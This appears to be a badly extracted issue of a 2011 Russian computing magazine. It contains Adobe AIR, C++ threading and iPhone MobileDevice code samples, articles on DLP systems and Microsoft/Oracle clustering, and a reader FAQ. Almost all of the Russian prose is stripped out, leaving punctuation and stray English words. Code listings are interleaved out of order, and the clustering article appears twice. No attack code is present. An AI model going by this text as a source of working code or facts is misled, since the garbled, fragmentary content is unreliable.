.
,
Hello, World (
F**ck you, World,
..). C ,
application.xml.
AIR-, -
. : , ,
, . application.xml. ,
.
.
, ?

<?xml version="1.0" encoding="utf-8" ?>
<application xmlns="http://ns.adobe.com/air/
application/1.0">
<id>com.xakep.HelloWorld</id>
<filename>Hello World</filename>
<version>1.0</version>
<title>HelloWorld Application</title>
<initialWindow>
<content>HelloWorld.html</content>
<visible>true</visible>
<height>100</height>
<width>300</width>
<x>100</x>
<y>100</y>
</initialWindow>
</application>

HelloWorld
, JavaScript-, .
:

css
//
js
//
images//
//

css-
js

.
: css, images, js.
: application.xml HelloWorld.html. .
.
HelloWorld.html. .
.
html-, swf-.
html-. , HelloWorld.html HelloWorld.html.
HelloWorld.html
<html>
<head>
<title>Hello World from AIR</title></head>
<body>
<center><h1>HELLO, WORLD!</h1></center>
</body>
</html>

108

, .
XML.
application
, . application xmlns XML.
AIR-.
. . .
?
Adobe AIR, . application
:
id AIR-.
com.
_._. 212 ;
filename air-. ,

( , name).
version :
title ;
initialWindow . swf-, html ( ). :
content ;
visible ;
width ;
height ;
X X;
Y Y;
X 03 /146/ 2011

>> coding

?
transparent ;
resizable ;
..
.
,
vr-online.ru/content/adobe-air-directives-2003.
,
Adobe AIR . . Aptana Studio
( ).
, , ,
. . ,
Hello World
.

, , .
?
, .
Aptana Studio
SimpleDowload.

: css, js, images. , .
- .
, , . ,
SimpleDownloader.html. ,
.
. HTML-
.

<body>
<center><h1>][ 0.1.1</h1></center><br /><br />
<b><label class="label"> : </b>
<input type="text" id="file_url" value="http://"
size="30"></label><br />
<b><label class="label"> :</b>
<input type="text" id="save_path" value="C:\temp\"
size="30"></label><br />
<button onclick="downloadIt();">!</button>
</body>

.
X 03 /146/ 2011

CSS
: , Adob Apple , . ,
css-.
css .
style.css :
.label {
float:left;
width:20em;
text-align: left;
clear:left;
margin-right: 20px;
color: #A77FFF;
}
h1 {
color: #008CFF;
}

css SimpleDownloader.html. ( head):


<link href="css/style.css" rel="stylesheet" media="all"
/>

,
. ,
. CSS , . CSS ,
.
, ,
JavaScript . , ,
- ,
JavaScript
. AIRAliases.js,
Adobe AIR SDK. -:
<script type="text/javascript" src="lib/air/AIRAliases.
js"></script>

URLStream,
URLRequest . , ,
.
SDK ( , ) ,
,
URLStream
(. ).

109

CODING


function downloadIt()
{
var file_url =
document.getElementById('file_url').value;
var save_path = document.getElementById(
'save_path').value + "\\"
+ GetFilename(file_url);
var download_url = new air.URLRequest(file_url);
var urlStream = new air.URLStream();
var file = new air.File();
file.nativePath = save_path;
var fileStream = new air.FileStream();
urlStream.addEventListener(
air.ProgressEvent.PROGRESS,
function(){
writeToFile(event, urlStream, fileStream);
}, false);
urlStream.addEventListener(
air.Event.COMPLETE,
function(){
saveFile(event, urlStream, fileStream);
}, false);
fileStream.open(file, air.FileMode.WRITE);

. writeToFile() saveFile().
,
, . COMPLETE

saveFile().
.
, .
, ,
,
, ,
JS (
AIR ).
.
writeToFile() saveFile().

Adobe AIR .
, .
.
, - (, yahoo),
. , .
! z

AIR

urlStream.load(download_url);
}
function writeToFile(e, urlStream, fileStream)
{
if (urlStream.bytesAvailable > 0)
{
var data = new air.ByteArray();
urlStream.readBytes(data, 0,
urlStream.bytesAvailable);
fileStream.writeBytes(data, 0, data.length);
}
}
function saveFile(e, urlStream, fileStream)
{
var data = new air.ByteArray();
urlStream.readBytes(data, 0,
urlStream.bytesAvailable);
fileStream.writeBytes(data, 0, data.length);
fileStream.close();
alert(" !");
}


. , Delphi/C++,
,
.
.
,
file_url save_path . ,
URLRequest ( ), URLStream
( ) File ( ).

110

Adobe AIR ,
. Titanium (- ][
). , Titunium , Adobe
AIR, , , :
Python,
Ruby, PHP JavaScript; ; HTTP; . , Titanium (appcelerator.com/products)
. ( Adobe AIR)
Open Source . ,
, ,
.


web-
/ -. ,
Adobe AIR, ,
. Mozilla Prism
(prism.mozilla.com). ,
Mozilla Corporation FireFox.
Prism
web-. ,
,
, Prism, , .
.
web-
. ?
(, )
Prism.
. web-,
, .
, Prism (
XULRunner) GUI.
X 03 /146/ 2011

CODING
deeonis deeonis@gmail.com

. ,
- .
.
. , C++
, .
,
.
Windows API CreateThread. _beginthread
, CreateThread . .

DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
//
//
return 0;
}
class MyClass
{
public:
MyClass(void);
~MyClass(void);
void RunThread();
private:
int m_intVar;


class MyClass
{
public:
...
void RunThread();
private:
DWORD WINAPI ThreadFunc(LPVOID lpParam);
int m_intVar;
};
DWORD WINAPI MyClass::ThreadFunc(LPVOID lpParam)
{
...
return 0;
}
void MyClass::RunThread()
{
HANDLE hThread;
DWORD idThread;
//
hThread = ::CreateThread(NULL, 0, &ThreadFunc,
0, 0, &idThread);

};
void MyClass::RunThread()
{
HANDLE hThread;
DWORD idThread;
hThread = ::CreateThread(NULL, 0, &ThreadFunc,
0, 0, &idThread);
}

. MyClass,
CreateThread. ThreadFunc . ,
, - .
, . ,
. :

112

,
, , .
, , ,
ThreadFunc
CreateThread. MyClass
,
, API , , , .

.
, ,
ThreadFunc , MyClass friend.
X 03 /146/ 2011

VS
private MyClass. , ThreadFunc
,
,

.

void MyClass::RunThread()
{
HANDLE hThread;
DWORD idThread;
//
//
hThread = ::CreateThread(NULL, 0, &ThreadFunc,
this, 0, &idThread);

,
DWORD WINAPI ThreadFunc(LPVOID lpParam);
}
class MyClass
{
public:
...
void RunThread();
friend DWORD WINAPI ThreadFunc(LPVOID lpParam);
private:
int m_intVar;
};
DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
// private
MyClass* mc = (MyClass*)lpParam;
mc->m_intVar = 90;
cout << _T("Start thread, m_intVar = ")
<< mc->m_intVar;
return 0;
}

X 03 /146/ 2011

, : ThreadFunc
MyClass, ,
.
, , , .
,
ThreadFunc . ,
, .
, .
,
.
- ThreadFunc , , MyClass, ,
.
,
.

class MyClass
{

113

CODING

MSDN CreateThread
public:
...
void RunThread();
private:
static DWORD WINAPI ThreadFunc(LPVOID lpParam);
int m_intVar;
};
DWORD WINAPI MyClass::ThreadFunc(LPVOID lpParam)
{
// private
MyClass* mc = (MyClass*)lpParam;
mc->m_intVar = 90;
cout << _T("Start thread, m_intVar = ")
<< mc->m_intVar;

,
. :
__closure
typedef unsigned long (__stdcall *ThdFunc)(void
*arg); //
typedef unsigned long (__closure *ClassMethod)(void
*arg); //
//

typedef union
{
ThrdFunc Function;
ClassMethod Method;
} tThrdAddr;
class MyClass
{
private:
tThrdAddr Addr;

return 0;

protected:
unsigned long ThreadFunc(void *arg)
{
...
};

}
void MyClass::RunThread()
{
HANDLE hThread;
DWORD idThread;

public:
RunThread()
{
DWORD idThread;

//
//
hThread = ::CreateThread(NULL, 0, &ThreadFunc,
0, 0, &idThread);

Addr.Method = &ThrdHandle;
//

.
MyClass,
. ThreadFunc private ,

.

, , .
, C++ Builder,
.
__closure,
. , . 4- ,

this ,
8- .

114

CreateThread(NULL, 0, Addr.Function,
this, 0, &idThread);
};
};

,
Builder, .
,
. , ,
, .

-, . , - -
.
. z
X 03 /146/ 2011

>> coding

CODING
(seva@vingrad.ru)

IPHONE
MAC
OS X
Mac OS X
Apple
, iPhone, iPad
iPod touch Mac OS X,
iTunes.

Mobile Device Framework.

:
iPhone ?. ,
,
, , iTunes Apple. iPhone
iPod ( iPod touch) Mac OS X, .
Apple
, ,
, Apple .
iPhone, .
Wi-Fi ( FlashDrive),
USB (iPhone Folders).
USB Wi-Fi ,
.
X 03 /146/ 2011

. , USB,
: (
jailbreak), .
iPhone folders
(iphonefolders.com). iPhone Folders Windows
Explorer, ,
iPod touch iPhone,
USB, . ,
,
jailbreak , iTunes.
(Touch Drive, Touch
Copy ), , ,
, .
Mac OS X
iPhoneDisk MacFuse,
iPhone.

115

CODING

libmobiledevice iPhone
Mac OS X :
usbmuxd/libiphone,
libmobiledevice
MobileDevice.framework.
Mac OS X
. /System/Library/
PrivateFrameworks/MobileDevice.framework. ,
, . ,
-,
theiphonewiki.com. mobiledevice.h,
MobileDevice.framework
, USB- . MobileDevice.
framework .

iPhone Finder
iPhoneDisk
,

, , , USB Drive,
Cydia. , , ,
,
. Default
: ,
iPhoto ( PTP Picture
Transfer Protocol) iTunes.
, Drive + iTunes, Mac OS X. PTP , Mass Storage,
USB-. iTunes XCode
. Drive Only
USB-. .

iTunes

, Apple
,
iTunes, ,
USB-, ,
. Apple
Linu, . libimobiledevice
(libimobiledevice.org). libimobiledevice , iPhone, iPod touch, iPad Apple TV.
,
jailbreak
.
, , SpringBoard, , .
, USB libusb-1.0. usbmuxd , TCP/IP USB. , USB-
,
, .
libusbmuxd. libiphone
iOS.
, AFC- ( AFC2-) . AFC (Apple File Connection)
, iPhone/iPod touch.
iTunes .

116

Objective-C/Cocoa. XCode MobileDevice.framework, . : MobileDevice MobileDeviceServer.



, / .

#import <Cocoa/Cocoa.h>
#import "MobileDevice.h"
@interface MobileDevice : NSObject {
@public
struct am_device * dev;
struct afc_connection * conn;
}
- (MobileDevice *) initWithDevice:
(struct am_device *) device;
- (MobileDevice *) copy;
// AFC
- (BOOL) connect;
// ,
- (NSString *) getValue: (CFStringRef) name;
//
- (BOOL) pathExist:

(NSString *) path;

- (BOOL) downloadFile: (NSString *)


remote_path toLocation: (NSString *) local_path;
- (BOOL) uploadFile: (NSString *) local_path
toLocation: (NSString *) remote_path;
- (BOOL) downloadDirectory: (NSString *) remote_path
toLocation: (NSString *) local_path;
- (BOOL) uploadDirectory: (NSString *) local_path
toLocation: (NSString *) remote_path;
- (BOOL) removeDirectory: (NSString *) remote_path;
- (BOOL) isDirectory:

(NSString *) path;

@end
// ,
// init , defaultServer
//
@interface MobileDeviceServer : NSObject {
@public
NSMutableArray * MobileDevices;
}
+ (MobileDeviceServer *) delfaultServer;
@end

MobileDeviceServer ,
.
X 03 /146/ 2011

>> coding

MobileDevice.framework /
,
MobileDevice.

Amarok

Rhythmbox
libgpod

ifuse

@implementation MobileDeviceServer

gvfs-afc

static MobileDeviceServer * DefaultServer = nil;

libiphone

static void AmDeviceNotificationCallback(


struct am_device_notification_callback_info
* info)

libusbmuxd

{
if (info->msg == ADNCI_MSG_CONNECTED)
{ //

usbmuxd

MobileDevice * device = [[MobileDevice alloc]


initWithDevice: info->dev];
[device connect];
[DefaultServer->MobileDevices addObject: device];

libusb-1.0

}
else if (info->msg == ADNCI_MSG_DISCONNECTED)
{ //

libmobiledevice

for (int i = 0;
i < [DefaultServer->MobileDevices count];
++i)
{ //
if (((MobileDevice *)[DefaultServer->MobileDevices
objectAtIndex: i])->dev == info->dev)
{
[DefaultServer->MobileDevices removeObjectAtIndex: i];

if (conn == nil) return FALSE;


afc_file_ref file_ref;
if (AFCFileRefOpen(conn, [remote_path cString],
AFC_MODE_READ, 0, &file_ref) != 0)
return FALSE;
FILE * local_file = fopen(
[local_path cString], "w");

break;

if (local_file == NULL) {
AFCFileRefClose(conn, file_ref);
return NO;
}

+ (MobileDeviceServer *) delfaultServer

char buffer[10000];

}
}
}

int len;

if (DefaultServer == nil) {
DefaultServer = [[MobileDeviceServer alloc] init];

do {
len = sizeof(buffer);
if (
AFCFileRefRead(conn, file_ref, buffer, &len) != 0)
{
fclose(local_file);
AFCFileRefClose(conn, file_ref);
return NO;
}

//
DefaultServer->MobileDevices =
[[NSMutableArray alloc] init];
// MobileDevice.framework
struct am_device_notification * subscription;
if (AMDeviceNotificationSubscribe(
&AmDeviceNotificationCallback,
0,0,0,&subscription) != 0)
{ // :(

fwrite(buffer, len, 1, local_file);


} while(len == sizeof(buffer));
fclose(local_file);

[DefaultServer->MobileDevices release];
[DefaultServer release];
DefaultServer = nil;
}

AFCFileRefClose(conn,
return YES;

}
return DefaultServer;
}
@end

AFC downloadFile MobileDevice.


, .
- (BOOL) downloadFile: (NSString *) remote_path
toLocation: (NSString *) local_path
{
X 03 /146/ 2011

file_ref);

, , Mac OS X
Apple, iPhone folders .
iPod/iPhone Mac OS X , ,
(iTunes, Apple mobile device support ).
. z

117

SYN/ACK
, InfoWatch


DLP-?



, ,
DLP-.
, ,
, , .
, , , , , ,
.
DLP-
-
. , DLP-
c ,
,
,
.
,
.
DLP-.
,
.
, , ( , ,
)
,
.
(, ) (Digital Fingerprints, Document
DNA, ).
, .

118

- (,
)
DLP. ,
-, ,
, .

email-. ,
.
,

.
, -?
, , ,
.
,
.
DLP-
.
:
. ,
, : .

.
(, , , , ),
X 03 /146/ 2011

(
, ,
, , ).
( ,

), . , .
,
.
(SMS, -)
, -, .
2008 ,
, , ,
.

,
, ,
,
. , ,

. , , -
, ,
.
( , , ) , .
.
,
. ,
,

, .
X 03 /146/ 2011


. .

( ,
)
,
. 2010
- , ,
,
.

.
, , , .
,
(, ),
, (,
) .


.
, , .

.
,
,
, .

119

SYN/ACK

.
.
.

, .
, ,
.
, ,

.
,
. ( ) , .
.
- , + - .
, ,
, , ,
, .


,
.
, ,

, , , , , .
. CAD/CAM,
, , (/) - ,
.
, DLP- .

-
. - Probably SPAM, , .
, (/ ),
, ,
.
92-95% , ,

120


(
).

, .

.
,
-, :
, .
DLP- ,
.
, DLP , Google.
, ,
.

(
)
70- , .
, .

,
.
, , ,
,
. , (
60%), 70- ,
. , - DLP-
, , ,
, .

,
,
. ,
,
,
.

,
X 03 /146/ 2011

,
.
.
, ( Digital Fingerprint,
Document DNA), , .
,
. ,
(
), .
, . ,
. (, 10 000 ),
, ,
9 900 , ,
.
,
, ,
. ,
,
-.
,

3% () 15% ( ). ,
.

,
-. ( 100%) ,
.

, .
, ()
.
, , , ,
.
.
, /, .
.

,
. (
, ) .

, . , , , ,
DLP- .
. , DLP- 100% , -.

X 03 /146/ 2011

,
-,
, .
, .
.
, MP4- .
,
, :
... ,
, ,
, , call-. ,
, . , ,
,
, . , DLP-
, , .

,
, . ,
, .

.
,
.
- , ,
. , , , , ,
. , , InfoWatch
Morph-OLogic, Websense PreciseID,
Digital Fingerprint, .
,
. , ,
. ,
.
.
,
DLP-. , , ,
( , , ),
,
.
.
,
, DRM-, Oracle IRM
Microsoft RMS.
DLP-
,
, .

. z

121

SYN/ACK
, IT-Academy & Softline it-university.ru


Microsoft Oracle
, , ,
.
, , .
, Microsoft Oracle.

(
),
.
. :

(high-availability clusters failover clusters)
.
(load-balancing clusters)
,
.
(compute clusters), , , , .
(HPC high performance computing clusters),
82% Top500.
(gird)
,
. -
,
. - HPC-, .
.
active/active, ,
active/passive.

122

Oracle RAC Network Load Balancing active/


active . Failover Cluster Windows Server
active/passive . active/active , . ,
, Ethernet, InfiniBand.
,
, Oracle RAC 15 .
Fibre Channel, iSCSI
NFS .

( Windows Server 2008 R2) ,
(OracleDatabase 11g), .

Windows Clustering

Microsoft
. Windows Server 2008 R2 : Network Load Balancing (NLB) Cluster Failover Cluster. Windows Server 2008 HPC Edition .
HPC-,
, web- .
NLB- TCP/IP .
, IIS, VPN . , X 03 /146/ 2011

SYN/ACK
, IT-Academy & Softline it-university.ru


Microsoft Oracle
, , ,
.
, , .
, Microsoft Oracle.

(
),
.
. :

(high-availability clusters failover clusters)
.
(load-balancing clusters)
,
.
(compute clusters), , , , .
(HPC high performance computing clusters),
82% Top500.
(gird)
,
. -
,
. - HPC-, .
.
active/active, ,
active/passive.

122

Oracle RAC Network Load Balancing active/


active . Failover Cluster Windows Server
active/passive . active/active , . ,
, Ethernet, InfiniBand.
,
, Oracle RAC 15 .
Fibre Channel, iSCSI
NFS .

( Windows Server 2008 R2) ,
(OracleDatabase 11g), .

Windows Clustering

Microsoft
. Windows Server 2008 R2 : Network Load Balancing (NLB) Cluster Failover Cluster. Windows Server 2008 HPC Edition .
HPC-,
, web- .
NLB- TCP/IP .
, IIS, VPN . , X 03 /146/ 2011

,
, . NLB-
x64-, x86.
Failoverclustering ,
.

LAN- WAN-, multi-site Windows Server 2008
500 , heartbeat.

. Enterprise edition ,
, .
(cluster-unaware)
.
(cluster-aware),
ClusterAPI,
.

failover-

.
, The Microsoft Support Policy
for Windows Server 2008 Failover Clusters. .
, FibreChannel, iSCSI Serial Attached SCSI. ,
Windows Server 2008, persistent
reservations.
X 03 /146/ 2011


Failover Clustering , Server Manager.
,
.
. , ,
member server, domain controller
DNS Exchange.
, . Failover
Cluster Management.
, (. 1).
. Failover Cluster
Management Create Cluster, , ,
IP-. ,
(,
), Failover Cluster Management
Do not allow the cluster to use this network.
,
. High Availability Wizard,
Services and Applications Failover
Cluster Management (. 2).

Cluster Shared Volumes

failover- LUN, ,
,

123

SYN/ACK

. 1. failover-
(. 3). LUN .
,
.
, - , LUN , ,
, LUN,
, LUN, .
( Hyper-V Server 2008)
LUN,
. Server
2008 R2 ,
Hyper-V CSV (Cluster Shared Volumes). CSV
,
(
) .
CSV NTFS.
CSV Failover Cluster Manage Enable
Cluster Shared Volumes. CSV
:
Get-Cluster | %{$_.EnableSharedVolumes = "Disabled"}
Failover
Clusters, PowerShell. CSV live
migration ,
. , (,
) , CSV, -. , -

124

, -. ,
(,
), -.

Oracle RAC

Oracle Real Application Clusters (RAC)


Oracle Database, Oracle Database 9i
OPS (Oracle Parallel Server).

. Oracle Database -


High Availability Microsoft: microsoft.com/
windowsserver2008/en/us/high-availability.aspx;

Failover Clustering NLB: blogs.msdn.com/b/clustering/
archive/2009/08/21/9878286.aspx ( Clusteringand HighAvailability );
Oracle RAC: oracle.com/
technetwork/database/clustering/overview/index.html;
Oracle Clusterware Oracle
Grid Infrastructure: oracle.com/technetwork/database/
clusterware/overview/index.html;
Oracle Clusterware Single Instance
Oracle Database 11g: oracle.com/technetwork/database/si-dbfailover-11g-134623.pdf.

X 03 /146/ 2011

. 2. High availability wizard


, ,
. ,
,
. (instance)
(SGA) .
RAC
.
RAC Enterprise Edition
. , RAC Standard
Edition, Enterprise Edition,
.

Oracle Grid Infrastructure

Oracle RAC Oracle Clusterware (


) .
( 11g R2
, , ). 11g Oracle Clusterware ASM Oracle Grid Infrastructure,
.
Automatic Storage Management (ASM)
, , singleinstance . ASM ASM Allocation Unit.
Allocation Unit AU_SIZE,
1, 2, 4, 8, 16, 32
64 MB. Allocation Units ASM-
(. 4).
, ASM, .
ASM- Failure Group (
X 03 /146/ 2011

, ,
, ), , Failure
Group. ASM
, . ASM ,
Oracle, ,
RMAN.
, ASM.
ASM-. Oracle ASM
, RAW-.

. 3. Failover_cluster

125

SYN/ACK

, Oracle
, Oracle.
Oracle
,
.
Installation Guide, .
,
Oracle
Clusterware. votingdisk (, ) Oracle Cluster Registry (
,
).
votingdisk. ASM ASMLib,
:
# rpm -Uvh oracleasm-support-2.1.3-1.el4.x86_64.rpm
# rpm -Uvh oracleasmlib-2.0.4-1.el4.x86_64.rpm
# rpm -Uvh oracleasm-2.6.9-55.0.12.ELsmp-2.0.3-1.
x86_64.rpm

. 4. ASM disk group

Oracle RAC

,
Oracle RAC active/active
(. 7).
Oracle Database
11g Release 2. Oracle
Enterprise Linux 5. Oracle Enterprise Linux ,
RedHat Enterprise Linux.


Interconnect, External Backup.
IP- ( Oracl e GNS) DNS (
GNS).
Grid Infrastructure.
,
(. 5).
; , ;
; .
root orainstRoot.sh
root.sh. orainstRoot.sh,

.
orainstRoot.sh root.
sh. :
/u01/grid/bin/crsctl check cluster all
, .
Oracle Universal installer (. 6),
.

. 5. OracleGrid Infrastructure

126

X 03 /146/ 2011

. 6. Oracle 11g R2 universal installer


active/active- 11g R2
active/passive-.
Oracle RACOneNode.
RAC Oracle Clusterware.
; Grid
Infrastructure, ASM_CRS SCAN;
Standalone. ,
.

Oracle RAC Oracle Grid Infrastructure


.

.
Microsoft , ,
. ,
, . z

. 7. Oracle RAC c

X 03 /146/ 2011

127

SYN/ACK
.., . InfoWatch




( ) ,
.

, ( ) , .
( )
, .
.
, , ,
.
(
), , , .
, .
XVI ,
XIX,
XX .
, ( , ) . , .
:
.
, -
, ,
.
,
,
.
, ,
,
.
.
. :

,
.

128


.
.
, ,
, ,
, , .

. ,
.
.
,
,
.
(, , ) ,
.
, .
, .
,
.

.
.
,
.
,
. ,
: .



(), DRM (Digital Rights
Management []
). X 03 /146/ 2011

. ,
CD, , ,
save as . . , :
, .
, ,
: , ,
,
, , (. 1299 ).
X 03 /146/ 2011

, , ( 4 2010 ,
).

, .
, . ,
(.
).

129

SYN/ACK

. .
( ) .

c Sony BMG
: , ,
.
.

,
, , .
. (. 273 ) ,
,
-
. .
DRM- XCP
Sony BMG . ,
-,
, (-, ),
.
, .
, , .
,
, 28 (. 272-274).

, , .
, ,
( ),

.
. . ,

. , ,
dbf- . ,
,
. , DBF, , -
,
.
, .
, , : !
. ,
.
, -
,
. .
: ,
!. - , , ,
, . -
,
. .
, ,

130

X 03 /146/ 2011

(. 273 ):
,
, , ,
, .
:
,
, ,
(,
), (
) .

PGPdisk.
.
,
. , .
.

,
.
.
.

. ,
, ,
. . , , ,
.
.
.
, . ,
,
.

. ,
, . ,
, :
, , , , . . , ,
.
, ,
.
, (
) , . ,
, . ,
. . .
, , , , - . ,
,
.
, .

. ,
.
. .
,
.

.
, , ,
. -,
. , ,
.
. .
, 273-
,
. ,
.
,
, : , , .
, .
, .
, , . z

.
. , , .
, . .
.

,
, ,

,
,

, ,

X 03 /146/ 2011

131

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:



:
, , ,
.

,
,
, ,
, ,
,
.

()
, .
,
. , -,
( , ), -
( ).
()
. ,

: , , (
,

);
,
.
:
(, ),
(, ),
, (),
, ,

132

,
.
, , ,
,
,
;
:
- ,
;
-
, ,

, , .
:
, .

,
99
, , PR
.


.
, , , ,
.
, ,

:
.
,
: ,
,
.


:
, , ,
.
,
:
, ,
,
(
,
, ).
,
: ,
, ,
-
,
,
. , ,
, ,
.


( ,
).

X 03 /146/ 2011

X 03 /146/ 2011

133

UNITS

(
)


.
( ) , , . ,

,
,
( ).

,
, ,
,
, .
,
,
,
, , ,
, , .
,
(
)
,
.

.


,
, , .
:
( )
, (
),
.
( ,
) , ,
, ,


.
: ,

.

- :
, ; ,
. ,
. ,
, -

134


, , , 1
.

,
. ,

,
, ,
.

-

,
.
1 ?

()

,
. - ? (
),
.
,
X 03 /146/ 2011

INFO

info







.

WARNING
warning

, ( + )
( ,

)
.

,
,
, , ,
, .

, ,
.

-
(-,
!).

,
.
,
, .


( , ) (,
-, ), X 03 /146/ 2011


,

. ,

,

,

.



,
.


,
,
,
. , ,
,

, .

:
, ,
, (
, ),
,
. , (

) ,
(
) , .
, ,
( ,

, ),

.


,
. , , , , .
:

135

UNITS

. Epic fail

, ,
,
. : (, ) ,
, ,
(,
) , .
, , .


, -,
,
. , ,
,
,
( )
.

!, !,
. ,

,
(: , ) ,
.
,

,
. , :
,
, ,
,
.
-

136

(, , )

: ,
(, ), ,
. , ,
.

),
, .
,

.

,
, .

, :
. ,
.

:
, . ,

. ,
.

,

, (),
.

:
- , ,

.
, - , .
, :

.

,
,
.
. ,

.
, ,
. -

,
,
.


,
,
SHODAN.
,

, . .
, ,
, :
, ,
.




( -

,
.
X 03 /146/ 2011



:
( ),
(,
). .
: ,
400 , 290,
, ,
200.
-
, ,
, ,
.

:
, .
,
: , , ,
.
, .
,
,
, , ,
,
-
.
,
0
!*,

, *
1500 ./
.
,
,
X 03 /146/ 2011

. , , ,


, , 100%. , , 98:
100 ,
,
, , , ,
.

.

, .
, :
,
( , )
,
( , ),
.
3/8 ( )
.

( ),
, ,
,
. ,
:
,
: ,
, .
, , , :

30 !.
( -

, ),
.
,
,

, , .
,
, -
, :
100%- , ?

. , ,

,
,
, 20-
, .

(,
), .

, .
( ) :
( ),
- , , , Sobranje.
. VIP, Business
Optima. .


,
.

,
,
. .

, , , .
,
- ,
,
(-, :
,
).
.
! :) z

137

UNITS
Step twitter.com/stepah

faq
united?
faq@real.xakep.ru

Q:
WinAPI-.
,

, . ( C++),
.
?
A: WinAPI
.
WebMoney,
WM Keeper
,
. (
,
)
(bit.ly/winapi_hack_
webmoney). .
,
++
. winapiexec (rammichael.com/
winapiexec),
. : winapiexec.
exe library.dll@FunctionName 123
unicode_text "a space"

, . ,

138

, winapiexec.
.
1.
: winapiexec.exe
CreateProcessW 0 calc 0 0 0 0x20 0
0 $a:0x44,,,,,,,,,,,,,,,, $b:16
, Sleep 1000 , TerminateProcess
$$:11@0 0
2. -: winapiexec.
exe u@SendMessageW ( u@FindWindowW
Shell_TrayWnd 0 ) 0x111 420 0
3. MessageBox temp:
winapiexec.exe GetTempPathW 260
$b:520 , u@MessageBoxW 0 $$:3 $$:0
0x40
,
WinAPI-,
: codeproject.com/KB/miscctrl/Taskbar_
Manipulation.aspx.

Q: , ,
.
FB2 ( ), ePub . ?
A: , .
FB2, ePub , ,
. ,
.
fb2epub.com FB2 ePub . ,
, -

.
, Kindle Amazon
(- $139, ,
Wi-Fi ).

: MOBI
-. Kindle
Calibre (calibre-ebook.
com). ,



.
, ,
FB2 ,
.

Q:
.
- ,

. ?
A: , , ( ) .
Windows
.
,
. ,
USB Safely Remove (safelyremove.com)
Zentimo (zentimo.com).
(
X 03 /146/ 2011

Loginza


,
, .

Amazon - Amazon Simple Email Service
(SES),
.
, ,

.
$0.10.

( $0.10 ).
(bit.
ly/amazon_ses_scripts), .
,
,

:).

Q:
MySQL. PBXT (primebase.org).
?
:


, , ),
( !) ,

.

Windows, .

. Wordpress, phpBB, Joomla,


Cogear, Drupal .

6 500 . ,
, ,
.

Q:
(Facebook, , Google ) .
?
A: -

:
1. , (,
MySQL 5.1 ).
mysql-: show
variables like "%plugin%".
SQL-
phpMyAdmin. -
/home/my-user/mysql/lib/mysql/plugin.
2. Lanchpad
(launchpad.net), Bazzar:
bzr branch lp:pbxt /tmp/pbxt-src
3. :
./configure --with-mysql=<builddir>/<mysql-src> --with-plugindir=
<mysql-dir>/lib/mysql/plugin
4. , , :
make && make install.
5.
SQL-,
: INSTALL PLUGIN
pbxt SONAME 'libpbxt.so'
6. ,
: CREATE TABLE t1 (c1 int,
c2 text) engine=pbxt;. : ALTER TABLE t1
engine=pbxt.
,
PBXT.

Q: email (
) . ,

sendmail, (
), ,
Lozinza (loginza.
. ru). , - ? ,
,
.
(, Google, Rambler, Mail.
A:
Ru, LiveJournal, etc), -

Q: , VPN-?
: , GRE-

Facebook, OpenID. Loginza.API



.
itshidden.com VPN-,
PPTP.
, , , GRE- -

X 03 /146/ 2011

subscribe.ru
( ),
.
!

139

UNITS

.
OpenVPN SSH-.

Q: ,

.
, .
?
A:
:
. ?
. ,

,
.
,
, .
(, Windows Mobile
Android), - . ,
,
. , ,

.
, ,
, .
. ,
,
.
iOS Simulator , Apple.

XCode Mac OS
X: developer.apple.com/devcenter/ios/index.action;
Android Emulator
Android 1.1, 1.5, 1.6, 2.0, 2.1, 2.2
& 2.3 (
SDK): developer.android.com/guide/
developing/tools/emulator.html;
Samsung Galaxy Tab Add-on c
Android SDK, Samsung
Galaxy Tab: innovator.samsungmobile.com/
galaxyTab.do;
HP webOS Emulator HP (Palm Pre, Palm Pixi,
Palm Pixi Plus), SDK:
developer.palm.com/index.php?id=1744;
Nokia Symbian Emulators
,
Symbian: bit.ly/symbian_emulators;
BlackBerry Simulators c
C Blackberry: blackberry.com/developers/
downloads/simulators;
Windows Mobile 6.5 Emulator Images WM6.5: bit.ly/WM65emulator;
Windows Phone 7 Simulator
Microsoft, -

140

Android
Visual Studio: bit.ly/
WP7simulator;
Bada Simulator Bada Samsung: bit.ly/Bada_simulator.

Q:
, Google Protocol Buffers. ,
? XML?
A: Protocol Buffers ( )
, .
XML, ,
. ,
,
\
, Java, C++ Python.
.proto-:
message Person {
required string name = 1;
required int32 id = 2;
optional string email = 3;
}

.proto- .

.
Person person;
person.set_name("John Doe");
person.set_id(1234);
person.set_email(
"jdoe@example.com");
fstream output(
"myfile", ios::out | ios::binary);
person.SerializeToOstream(&output);

XML? Protocol

Buffers , 10-20 3-10


.
.
, Twitter
Protocol Buffers. Twitter, XML .
(code.google.
com/p/protobuf).

MessagePack (msgpack.
org), .
, JSON, ,
,
. Ruby,
Perl, Python, C/C++, Java, PHP, Haskell, Lua.

Q: Windows,
,
Linux- BSD-?
,
Ext4.
, , Ext2/3/4 UFS/UFS2.
A: R.Saver
(rlab.ru/tools/rsaver.html).
FAT
NTFS.
:
Microsoft Windows: FAT NTFS,
FAT12, FAT16, FAT32, NTFS, NTFS5;
Apple Mac OS: HFS, HFS+/HFSX;
Linux: Ext2, Ext3, Ext4, ReiserFS, JFS XFS;
Unix, BSD, Sun Solaris: UFS UFS2 (FFS),
UFS , Sparc/Power .
z

X 03 /146/ 2011

1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )

12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).

>Net
Angry IP Scanner 4.0 beta4
Configuration Center Workgroup 1.7
DNS Performance Test

>Multimedia
calibre 0.7.44
Dual Monitor Tools 1.7
Fraps 3.2.8
freac 1.0.17a
GrooveWalrus 0.331
ImgBurn 2.5.5.0
Kindle for PC
Miro 3.5
Okozo Desktop 1.1.6
SaveGameBackup.net 1.0.3
Skype Recorder 3.0
Sumatra PDF 1.3
UMPlayer 0.9
VLC media player 1.1.7

>Misc
Auspex 1.2.2.98
Boot Snooze 1.0.5
briss 0.0.12
File Bucket 1.1.0
Input Director v1.2.2
Locate32 3.0
Microsoft Mathematics 4.0
Moo0 FileShredder 1.15
Registry Commander 10.04
SearchMyFiles 1.62
Shapeshifter 3.09
SysInternalsUpdater 1.0.0
Translate.Net 0.1.34
